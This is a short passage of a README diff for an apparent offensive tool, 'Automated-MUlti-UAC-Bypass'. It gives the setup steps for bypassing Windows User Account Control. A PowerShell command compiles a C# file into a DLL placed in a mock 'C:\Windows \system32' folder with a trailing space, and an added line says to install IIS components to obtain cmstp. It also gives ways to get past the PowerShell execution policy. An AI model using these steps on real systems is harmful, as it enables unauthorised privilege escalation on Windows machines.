x0xr00t/Automated-MUlti-UAC-Bypass/README.md

 * output to system 32
 `Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\sl0puacb.cs")) -ReferencedAssemblies "System.Windows.Forms" -OutputAssembly "C:\Windows \system32\sl0p.dll`

+# Windows 10 and 11
+* install Windows IIS libs, it is needed to get cmstp.

 # Setup
 * `Set-ExecutionPolicy -ExecutionPolicy {Unrestricted or Bypass} -Scope CurrentUser`
 * Or use one of the bypasses like `type file.ps1 | poweshell.exe -no-profile` or what ever suites